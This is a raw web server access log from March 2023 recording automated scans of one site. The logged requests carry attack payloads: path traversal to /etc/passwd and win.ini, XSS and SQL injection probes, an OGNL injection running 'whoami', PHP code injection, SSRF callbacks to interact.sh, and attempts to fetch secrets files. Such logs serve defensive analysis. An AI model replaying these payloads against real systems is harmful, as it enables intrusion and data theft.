72.44.65.82 - - [08/Mar/2023:17:51:36 +0530] "GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00 HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:17:51:44 +0530] "GET /index.php?page=windows/win.ini HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:17:51:44 +0530] "GET /index.php?page=windows/win.ini%00 HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:17:51:55 +0530] "GET /index.php?page=....//....//windows/win.ini HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:17:51:57 +0530] "GET /.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:17:52:04 +0530] "GET /http://103.145.51.236:8080/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/windows/win.ini HTTP/1.1" 404 1288
72.44.65.82 - - [08/Mar/2023:17:52:05 +0530] "GET /../../../../../../../../../windows/win.ini HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:17:52:07 +0530] "GET /%5C%5C..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/windows/win.ini HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:17:55:09 +0530] "GET /echo-server.html?code=test&state=http://www.interact.sh HTTP/1.1" 404 1026
72.44.65.82 - - [08/Mar/2023:17:58:28 +0530] "GET null null" 400 -
72.44.65.82 - - [08/Mar/2023:18:01:41 +0530] "GET /NetBiblio/search/shortview?searchField=W&searchTerm=x%27%2Balert%281%29%2B%27x&searchType=Simple HTTP/1.1" 404 1046
72.44.65.82 - - [08/Mar/2023:18:04:37 +0530] "GET /.//WEB-INF/weblogic.xml HTTP/1.1" 404 992
72.44.65.82 - - [08/Mar/2023:18:04:53 +0530] "GET /Solar_History.php?command=%95%5C%8E%A6&event_level=0&event_pcs=1&record=10&search_off=on&search_on=on&sort_type=0&time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end&word=hj%27 HTTP/1.1" 404 1028
72.44.65.82 - - [08/Mar/2023:18:06:00 +0530] "GET /?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:18:06:42 +0530] "GET /rest/api/latest/groupuserpicker?maxResults=50000&query=1&showAvatar=true HTTP/1.1" 404 1056
90.151.171.106 - - [08/Mar/2023:18:10:50 +0530] "CONNECT fingerprints.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:18:10:50 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:18:10:50 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:18:10:50 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:18:10:50 +0530] "GET /ip?Z70629657371Q1 HTTP/1.1" 404 998
90.151.171.106 - - [08/Mar/2023:18:10:50 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:18:10:55 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:18:10:55 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:18:22:07 +0530] "GET /v2/auth/roles HTTP/1.1" 404 1020
72.44.65.82 - - [08/Mar/2023:18:25:04 +0530] "GET /WidgetHandler.ashx?ID=1&MethodName=Sort&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29&row=1 HTTP/1.1" 404 1030
124.89.86.179 - - [08/Mar/2023:18:29:15 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:16 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:16 +0530] "GET / HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:18:29:16 +0530] "GET /cobbler/ HTTP/1.1" 404 1010
124.89.86.179 - - [08/Mar/2023:18:29:17 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:17 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:18 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:18 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:19 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:19 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:20 +0530] "GET / HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:18:29:20 +0530] "GET /cblr/ HTTP/1.1" 404 1004
124.89.86.179 - - [08/Mar/2023:18:29:20 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:21 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:21 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:22 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:22 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:23 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:23 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:23 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:24 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:24 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:25 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:25 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:26 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:26 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:27 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:27 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:28 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:28 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:29 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:29 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:30 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:30 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:31 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:31 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:32 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:32 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:33 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:33 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:34 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:34 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:35 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:35 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:36 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:36 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:36 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:37 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:37 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:38 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:38 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:39 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:39 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:40 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:40 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:41 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:41 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:42 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:42 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:43 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:43 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:44 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:44 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:45 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:45 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:46 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:46 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:47 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:47 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:48 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:48 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:49 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:49 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:50 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:50 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:51 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:51 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:52 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:52 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:52 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:53 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:53 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:54 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:54 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:55 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:55 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:56 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:56 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:57 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:57 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:58 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:58 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:59 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:59 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:29:59 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:30:00 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:30:00 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:30:01 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:30:01 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:30:02 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:30:02 +0530] "GET / HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:18:30:03 +0530] "GET /webadmin/clientlogin/?action=showdeny&srid&url HTTP/1.1" 404 1036
124.89.86.179 - - [08/Mar/2023:18:30:03 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:30:03 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:30:04 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:30:04 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:30:05 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:30:05 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:30:06 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:30:06 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:30:07 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:30:07 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:30:08 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:30:08 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:30:09 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:30:09 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:30:10 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:30:10 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:30:10 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:30:11 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:30:11 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:30:12 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:30:13 +0530] "GET / HTTP/1.1" 400 -
124.89.86.179 - - [08/Mar/2023:18:30:13 +0530] "GET / HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:18:31:27 +0530] "GET /users/registration HTTP/1.1" 404 1030
72.44.65.82 - - [08/Mar/2023:18:32:24 +0530] "GET /en-US/splunkd/__raw/services/server/info/server-info?output_mode=json HTTP/1.1" 404 1098
72.44.65.82 - - [08/Mar/2023:18:32:28 +0530] "GET /__raw/services/server/info/server-info?output_mode=json HTTP/1.1" 404 1070
72.44.65.82 - - [08/Mar/2023:18:33:21 +0530] "GET /console/ HTTP/1.1" 404 1010
72.44.65.82 - - [08/Mar/2023:18:33:31 +0530] "GET /console/ HTTP/1.1" 404 1010
72.44.65.82 - - [08/Mar/2023:18:33:52 +0530] "POST /console/j_security_check HTTP/1.1" 404 1042
72.44.65.82 - - [08/Mar/2023:18:33:54 +0530] "GET /console/ HTTP/1.1" 404 1010
72.44.65.82 - - [08/Mar/2023:18:34:11 +0530] "GET /console/ HTTP/1.1" 404 1010
72.44.65.82 - - [08/Mar/2023:18:34:29 +0530] "GET /console/ HTTP/1.1" 404 1010
72.44.65.82 - - [08/Mar/2023:18:34:50 +0530] "POST /console/j_security_check HTTP/1.1" 404 1042
72.44.65.82 - - [08/Mar/2023:18:35:43 +0530] "GET /wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh HTTP/1.1" 404 1124
45.61.185.123 - - [08/Mar/2023:18:36:58 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:18:42:02 +0530] "GET /CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 400 -
64.62.197.210 - - [08/Mar/2023:18:46:40 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:18:51:02 +0530] "POST /page/exportImport/uploadOperation.jsp HTTP/1.1" 404 1068
72.44.65.82 - - [08/Mar/2023:18:51:03 +0530] "GET /page/exportImport/fileTransfer/2MgieRE19vqWndLX5c0QdLIJNoM.jsp HTTP/1.1" 404 1118
72.44.65.82 - - [08/Mar/2023:18:52:12 +0530] "GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en HTTP/1.1" 404 1052
72.44.65.82 - - [08/Mar/2023:18:52:54 +0530] "GET /resource/file%3a///etc/passwd/ HTTP/1.1" 404 1054
72.44.65.82 - - [08/Mar/2023:18:53:44 +0530] "GET /php/node_info.php HTTP/1.1" 404 1028
72.44.65.82 - - [08/Mar/2023:18:54:15 +0530] "GET /web/database/manager HTTP/1.1" 404 1034
90.151.171.106 - - [08/Mar/2023:18:55:15 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:18:55:15 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:18:55:15 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:18:55:15 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:18:55:16 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:18:55:21 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:18:55:21 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:18:55:21 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:18:55:56 +0530] "GET /system/console?.css HTTP/1.1" 404 1022
72.44.65.82 - - [08/Mar/2023:18:57:07 +0530] "GET /secrets.yml HTTP/1.1" 404 1016
72.44.65.82 - - [08/Mar/2023:18:57:07 +0530] "GET /config/secrets.yml HTTP/1.1" 404 1030
72.44.65.82 - - [08/Mar/2023:18:57:08 +0530] "GET /test/config/secrets.yml HTTP/1.1" 404 1040
72.44.65.82 - - [08/Mar/2023:18:57:15 +0530] "GET /redmine/config/secrets.yml HTTP/1.1" 404 1046
72.44.65.82 - - [08/Mar/2023:18:57:23 +0530] "GET /?action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:18:57:24 +0530] "GET /?api=%27%3E%22%3Csvg%2Fonload=confirm%28%27api%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27api_key%27%29%3E&begindate=%27%3E%22%3Csvg%2Fonload=confirm%28%27begindate%27%29%3E&callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27callback%27%29%3E&categoryid=%27%3E%22%3Csvg%2Fonload=confirm%28%27categoryid%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27csrf_token%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27email%27%29%3E&emailto=%27%3E%22%3Csvg%2Fonload=confirm%28%27emailto%27%29%3E&enddate=%27%3E%22%3Csvg%2Fonload=confirm%28%27enddate%27%29%3E&immagine=%27%3E%22%3Csvg%2Fonload=confirm%28%27immagine%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27item%27%29%3E&jsonp=%27%3E%22%3Csvg%2Fonload=confirm%28%27jsonp%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27l%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27lang%27%29%3E&list_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27list_type%27%29%3E HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:18:58:16 +0530] "GET /index.php?action=post&order=bszop%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:18:59:22 +0530] "GET /s/2Mgids5AjGPvocNu2pQLJ3h7gDl/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1" 404 1200
72.44.65.82 - - [08/Mar/2023:18:59:44 +0530] "POST /wp-json/rsvpmaker/v1/stripesuccess/anythinghere HTTP/1.1" 404 1088
78.108.177.54 - - [08/Mar/2023:19:00:33 +0530] "GET / HTTP/1.0" 200 11230
72.44.65.82 - - [08/Mar/2023:19:01:20 +0530] "GET /wp-json/wp/v2/posts?per_page=1 HTTP/1.1" 404 1032
72.44.65.82 - - [08/Mar/2023:19:01:30 +0530] "GET /nagiosxi/login.php?redirect=/www.interact.sh HTTP/1.1" 404 1030
72.44.65.82 - - [08/Mar/2023:19:14:23 +0530] "t3 12.2.1 " 400 -
72.44.65.82 - - [08/Mar/2023:19:20:08 +0530] "GET /wp-content/uploads/pdf-invoices/ HTTP/1.1" 404 1058
72.44.65.82 - - [08/Mar/2023:19:20:49 +0530] "GET /cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo HTTP/1.1" 404 1024
72.44.65.82 - - [08/Mar/2023:19:21:54 +0530] "GET /?code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)--%20-&rest_route=/pmpro/v1/order HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:19:24:12 +0530] "GET /cgi-bin/slogin/login.py HTTP/1.1" 404 1040
72.44.65.82 - - [08/Mar/2023:19:27:55 +0530] "GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1" 404 1568
72.44.65.82 - - [08/Mar/2023:19:29:39 +0530] "GET /sftp.json HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:19:29:43 +0530] "GET /cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1036
72.44.65.82 - - [08/Mar/2023:19:29:51 +0530] "GET /.vscode/sftp.json HTTP/1.1" 404 1028
151.246.14.166 - - [08/Mar/2023:19:34:40 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:19:34:54 +0530] "POST /index.php HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:19:43:03 +0530] "GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1" 404 1040
72.44.65.82 - - [08/Mar/2023:19:46:28 +0530] "GET /test.txt HTTP/1.1" 404 1010
72.44.65.82 - - [08/Mar/2023:19:47:52 +0530] "GET /microstrategy7/Login.asp?Msg=%22%3E%3Cscript%3Ealert(/2MgieFqbbkWW9I6k0GQst6W2pV4/)%3B%3C%2Fscript%3E%3C&Port=0&Project=Project001&Server=Server001&Uid=Uid001 HTTP/1.1" 404 1042
72.44.65.82 - - [08/Mar/2023:19:48:12 +0530] "GET /wp-content/uploads/wp-security-audit-log/failed-logins/ HTTP/1.1" 404 1104
90.151.171.108 - - [08/Mar/2023:19:49:02 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.108 - - [08/Mar/2023:19:49:02 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [08/Mar/2023:19:49:07 +0530] "-" 400 -
90.151.171.108 - - [08/Mar/2023:19:49:07 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:19:49:08 +0530] "GET /webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo()%20?%3E HTTP/1.1" 404 1048
90.151.171.108 - - [08/Mar/2023:19:49:12 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [08/Mar/2023:19:49:12 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [08/Mar/2023:19:49:17 +0530] "-" 400 -
90.151.171.108 - - [08/Mar/2023:19:49:17 +0530] "-" 400 -
172.104.242.173 - - [08/Mar/2023:19:49:37 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:19:51:23 +0530] "POST /RPC2_Login HTTP/1.1" 404 1014
72.44.65.82 - - [08/Mar/2023:19:52:06 +0530] "GET null null" 400 -
72.44.65.82 - - [08/Mar/2023:19:55:33 +0530] "GET /pandora_console/attachment/pandora_chat.log.json.txt HTTP/1.1" 404 1098
167.99.243.44 - - [08/Mar/2023:19:55:35 +0530] "-" 400 -
167.99.243.44 - - [08/Mar/2023:19:55:35 +0530] "-" 400 -
167.99.243.44 - - [08/Mar/2023:19:55:36 +0530] "GET / HTTP/1.1" 200 11250
167.99.243.44 - - [08/Mar/2023:19:55:36 +0530] "-" 400 -
167.99.243.44 - - [08/Mar/2023:19:55:37 +0530] "-" 400 -
180.123.156.215 - - [08/Mar/2023:19:57:04 +0530] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 1030
180.123.156.215 - - [08/Mar/2023:19:57:04 +0530] "-" 400 -
64.62.197.192 - - [08/Mar/2023:20:02:43 +0530] "GET / HTTP/1.1" 200 11250
64.62.197.189 - - [08/Mar/2023:20:03:20 +0530] "GET /?format=json HTTP/1.1" 200 11250
64.62.197.193 - - [08/Mar/2023:20:03:32 +0530] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:20:03:44 +0530] "GET /miscadmin HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:20:03:55 +0530] "GET /miscadmin HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:20:03:56 +0530] "GET /miscadmin HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:20:03:57 +0530] "GET /miscadmin HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:20:05:11 +0530] "GET /index.php?s=example HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:20:11:31 +0530] "POST /assets/php/profile.php HTTP/1.1" 404 1038
72.44.65.82 - - [08/Mar/2023:20:11:35 +0530] "POST /vendor/qcubed/qcubed/assets/php/profile.php HTTP/1.1" 404 1080
72.44.65.82 - - [08/Mar/2023:20:12:37 +0530] "POST /?rest_route=/notificationx/v1/analytics HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:20:13:15 +0530] "GET /i3geo/exemplos/codemirror.php?pagina=../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1052
72.44.65.82 - - [08/Mar/2023:20:14:09 +0530] "GET /script/ HTTP/1.1" 404 1008
90.151.171.106 - - [08/Mar/2023:20:16:47 +0530] "CONNECT fingerprints.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:20:16:47 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:20:16:48 +0530] "-" 400 -
